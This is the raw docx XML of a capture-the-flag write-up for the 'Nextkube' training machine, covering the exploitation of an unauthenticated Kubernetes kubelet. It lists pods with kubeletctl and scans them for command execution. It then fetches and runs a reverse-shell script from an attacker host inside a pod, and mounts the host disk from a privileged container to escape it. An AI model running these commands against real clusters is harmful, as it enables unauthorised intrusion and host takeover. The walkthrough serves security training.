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NEXTKUBE</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine.If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fmovvelaodwi"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5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6443/tcp – Kubernetes API server (master nodes)</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10250/tcp – Kubernetes kubelet API server (master and worker nodes)</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TCP 6781-6784 – Weave Net</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">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10256/tcp – Health check server</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Kubernetes</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“k8s”,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an open-source platform that automates Linux container operations. Kubernetes eliminates much of the manual processes required to deploy and scale containerized applications. In other words, if you want to cluster hosts running Linux containers, Kubernetes helps manage those clusters easily and efficiently. These clusters may include hosts in public cloud, private cloud, or hybrid cloud environments.</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kubelet</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the primary “node agent” that runs on each node. It can register the node with the API server using one of the following: the hostname; a flag to override the hostname; or cloud provider–specific logic.</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kubelet </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">works based on a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PodSpec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. A PodSpec is a YAML or JSON object that describes a pod. The kubelet receives a set of PodSpecs (mainly through the API server) and ensures that the containers described in those PodSpecs are running and healthy. The kubelet does not manage containers that were not created by Kubernetes. Focus on Port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10250</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75100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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researching how to exploit the kubelet, I found this excellent resource:</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Anyone with access to the kubelet port (10250), even without a certificate, can execute commands inside the container.</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hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://cloudsecdocs.com/container_security/offensive/attacks/techniques/kubelet_exploit/</w:t>
        </w:r>
      </w:hyperlink>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first command I will use is to list the pods. But first, a brief explanation of what pods are.</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Pods are the smallest and most basic deployable objects in Kubernetes. A pod represents a single instance of a running process in your cluster. Pods contain one or more containers, such as Docker containers. Containers within a pod share the same network namespace, including IP address and network ports.</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following command to list the pods:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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-k "https://172.31.31.52:10250/pods" | jq</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">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4p50o6t4vikd" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>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4292600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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also have another tool that lists pods in a cleaner format.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">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GitHub - cyberark/kubeletctl: A client for kubelet</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/cyberark/kubeletctl</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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kubeletctl -s 172.31.31.52 pods</w:t>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30700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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listing the pods, we can run another command to check which pods allow command execution:</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kubeletctl -s 172.31.31.52 scan rce</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95600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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running the command above, we get several results. What caught my attention was the pod named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nao-entre-aqui-5d96bf744-rzrf2.</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can execute commands in this pod, we can obtain a reverse shell.</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create a Bash reverse shell.</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4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 a Netcat listener.</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56"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Start a Python server to host our payload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shell.sh</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41600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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Because </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kubeletctl </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">complains about certain characters when passing the payload directly via command line, we will download the shell to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first and then execute it.</w:t>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09700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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kubeletctl -s 172.31.31.52 exec "curl 10.10.14.2/shell.sh -o /tmp/shell.sh" -p nao-entre-aqui-5d96bf744-rzrf2 -c nao-entre-aqui</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kubeletctl -s 172.31.31.52 exec "sh /tmp/shell.sh" -p nao-entre-aqui-5d96bf744-rzrf2 -c nao-entre-aqui</w:t>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6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rk0o9htz22ms" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TTY Shell (Without Python)</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09800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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gaining shell access inside the container, something caught my attention. While listing the pods, I noticed that the containers named “nao-entre-aqui” have </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"privileged": true. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With the privileged flag enabled, we can attempt to access the host disk.</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"nao-entre-aqui",</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"privileged": true</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4">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId22">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation#privileged</w:t>
        </w:r>
      </w:hyperlink>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I tried using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fdisk -l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to view host disks, but it was not installed. No problem — we can use alternatives such as:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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lsblk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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df -h</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14600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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mount the host disk: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mount /dev/nvme0n1p1  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/mnt</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09900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/mnt/root </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we find our root flag. Two more to go =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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32100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59"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find the remaining flags faster, we use a tool called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ripgrep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ripgrep</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a line-oriented search tool that recursively searches the current directory for a regex pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">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GitHub – BurntSushi/ripgrep</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId26">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/BurntSushi/ripgrep/releases</w:t>
        </w:r>
      </w:hyperlink>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84500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="62"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49700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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uploading the binary to the container, execute:</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rg -w 'uhc\{*' / 2&gt;/dev/null</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is the pattern used for Hacking Club flags. Using this command, we can easily find the remaining flags.</w:t>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had already found the root flag, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rg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located the other two missing flags.</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95600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="58"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headerReference r:id="rId30" w:type="default"/>
      <w:headerReference r:id="rId31" w:type="first"/>
      <w:headerReference r:id="rId32" w:type="even"/>
      <w:footerReference r:id="rId33" w:type="default"/>
      <w:footerReference r:id="rId34" w:type="first"/>
      <w:footerReference r:id="rId35"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A">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o"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1" name="image6.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image6.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B">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C">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7"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Nextkube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hyperlink" Target="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation#privileged" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.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hyperlink" Target="https://github.com/BurntSushi/ripgrep/releases" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.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hyperlink" Target="https://app.hackingclub.com/training/training-machines/27"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cloudsecdocs.com/container_security/offensive/attacks/techniques/kubelet_exploit/" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cyberark/kubeletctl" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><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20.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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qDE+xHCsvXHDMiCtocHagWJSA==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLmZtb3Z2ZWxhb2R3aTIOaC40cDUwbzZ0NHZpa2QyDmgucmswbzlodHoyMm1zMg5oLjE3NWY1Y3M5NHowbzgAciExaVZNZnJIVXdYZl9GdWtTbTVVdkhiZk5RSmVEWVNHa3Q=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